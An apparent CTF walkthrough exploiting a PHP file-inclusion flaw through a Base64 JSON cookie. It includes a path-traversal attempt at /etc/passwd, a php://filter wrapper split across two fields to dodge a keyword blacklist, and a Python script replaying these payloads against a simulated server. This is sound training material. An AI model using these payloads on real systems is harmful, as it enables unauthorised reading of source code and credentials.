Advent of CTF - Challenge 11

“Filter”

Challenge

Building on the previous challenge, this one adds a layer of complexity: the input is filtered, and several elements have to be combined to achieve exfiltration.

In this challenge you will learn:

  • How to detect filtering
  • How to use php://filter

Solution

Santa’s book of secrets has upgraded its security. All should be fine now.

The challenge starts with the same page as Challenge 10. Since the description says the security has been upgraded, it is fair to assume this is the same type of challenge, only with some added security measures.

the-challenge.png
Figure 1: The start of the challenge

Requesting flag.php directly returns the text Direct access not permitted. So this time the flag cannot be read simply by browsing to the page.

cookie.png
Figure 2: The cookie

As with the previous challenge, there is a cookie for zerooneone.

eyJwYXRoIjoiLiIsInBhZ2UiOiJtYWluIn0=

As in almost all previous challenges, the cookie holds a Base64 encoded JSON structure. Decoding it reveals two keys: path and page. The current values are . (the current directory) and main (the main.php page).

{"path":".", "page":"main" }

The first thing to try is to change the page value to flag. This should include the flag.php file which, according to the description, exists.

{"path":".", "page":"flag" }

This, however, results in an error message. The text at the end of the line reads no direct access, so the file is there, but it refuses to be accessed this way.

flag-include.png
Figure 3: Direct access error message

Playing around with this payload might make you try to change the path. As soon as the path contains more than one . in a row, the page throws an error as well.

{"path":"../../../../../../", "page":"/etc/passwd" }

A similar error message is displayed. So the flag cannot be retrieved directly, and traversing the file system does not work either.

dots.png
Figure 4: Soo many dots error message

Investigating ways to exploit a file inclusion in PHP eventually leads to extracting data with php://filter. This is one of PHP's stream wrappers: it applies a stream filter, such as convert.base64-encode, to a resource while it is being read. Because the file is read instead of executed, the source of a PHP file comes back Base64 encoded rather than being run. This seems like a great opportunity.

{"path":".", "page":"php://filter/convert.base64-encode/resource=flag" }

This, however, also ends in an error message, this time stating that the input hit a blacklist.

blacklist.png
Figure 5: Blacklist error message

So certain words in the payload are blacklisted. Experimenting with the two values shows that the word filter is not allowed in the page value, and the word base is not allowed in the path value.

Thinking the challenge over, the way the two parts of the JSON structure are used can be assumed to be something like the listing below.

include($data["path"] . "/" . $data["page"] . ".php");

Using this knowledge, and knowing what is allowed in each part, the PHP wrapper can be split in two. The first part, containing filter, goes in the path; the second part, containing convert.base64-encode, goes in the page. The / that the code inserts between the two, and the .php it appends, reassemble the full wrapper string php://filter/convert.base64-encode/resource=flag.php.

{"path":"php://filter", "page":"convert.base64-encode/resource=flag" }

This payload results in a large blob of Base64 text being rendered on the page.

extract.png
Figure 6: The encoded flag.php

Decoding the blob reveals the source of flag.php, and the flag can be read from the code.
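The whole chain, from building the cookie through to decoding the blob, as an added Python example that is not part of the original writeup. The server-side code was never shown in the challenge, so the checks in include_target and simulate_include (the .. check, the two blacklists, and the guard inside flag.php) are assumptions modelled on the error messages described above, and FAKE_FLAG_PHP with its flag value is a constructed stand-in for the real file.

```python
import base64
import json
import re

# Constructed model of the challenge's server-side logic. The real source was
# never shown in the writeup; the checks below are ASSUMPTIONS that reproduce
# the observed error messages so the payloads can be tested offline.
PATH_BLACKLIST = ("base",)     # observed: "base" rejected in path
PAGE_BLACKLIST = ("filter",)   # observed: "filter" rejected in page

# Constructed stand-in for flag.php (not the real file, not the real flag).
FAKE_FLAG_PHP = (
    "<?php\n"
    "if (!defined('FROM_INDEX')) { die('Direct access not permitted'); }\n"
    "$flag = 'FLAG{constructed_example_flag}';\n"
)


def make_cookie(path: str, page: str) -> str:
    """Build the zerooneone cookie: Base64 of a compact JSON object."""
    payload = json.dumps({"path": path, "page": page}, separators=(",", ":"))
    return base64.b64encode(payload.encode()).decode()


def read_cookie(cookie: str) -> dict:
    """Inverse of make_cookie: Base64-decode and parse the JSON."""
    return json.loads(base64.b64decode(cookie))


def include_target(cookie: str) -> str:
    """Return the string the assumed include() would receive, or raise
    ValueError with the error class the writeup describes."""
    data = read_cookie(cookie)
    path, page = data["path"], data["page"]
    if ".." in path:
        raise ValueError("too many dots")
    if any(w in path for w in PATH_BLACKLIST) or any(w in page for w in PAGE_BLACKLIST):
        raise ValueError("blacklist")
    # Assumed sink: include($data["path"] . "/" . $data["page"] . ".php")
    return f"{path}/{page}.php"


def simulate_include(cookie: str) -> str:
    """Model what the page renders for a given cookie.

    A plain include executes flag.php, whose (assumed) guard dies with
    'Direct access not permitted'. Through php://filter the file is only
    read, so its source comes back Base64 encoded and nothing executes.
    """
    target = include_target(cookie)
    prefix = "php://filter/convert.base64-encode/resource="
    if target.startswith(prefix) and target[len(prefix):] == "flag.php":
        return base64.b64encode(FAKE_FLAG_PHP.encode()).decode()
    if target.endswith("flag.php"):
        return "Direct access not permitted"
    return f"<rendered {target}>"


def extract_flag(blob: str) -> str:
    """Decode the Base64 blob and pull the flag out of the PHP source."""
    source = base64.b64decode(blob).decode()
    match = re.search(r"FLAG\{[^}]*\}", source)
    if not match:
        raise ValueError("no flag in decoded source")
    return match.group(0)


def attempt(path: str, page: str) -> str:
    """Run one payload end to end and return the outcome as text."""
    try:
        return simulate_include(make_cookie(path, page))
    except ValueError as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    # The four payloads from the writeup, in the order they were tried.
    for path, page in [
        (".", "flag"),
        ("../../../../../../", "/etc/passwd"),
        (".", "php://filter/convert.base64-encode/resource=flag"),
        ("php://filter", "convert.base64-encode/resource=flag"),
    ]:
        print(f"{path!r:24} {page!r:52} -> {attempt(path, page)[:60]}")
    blob = attempt("php://filter", "convert.base64-encode/resource=flag")
    print("decoded flag:", extract_flag(blob))
```

Only the final, split payload gets past all three checks; the others stop exactly where the writeup's screenshots do. make_cookie uses compact JSON separators so that the cookie for path . and page main reproduces the original cookie value byte for byte.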

flag.png
Figure 7: The flag

Be sure to grab your points and the badge.

badge.png
Figure 8: The badge
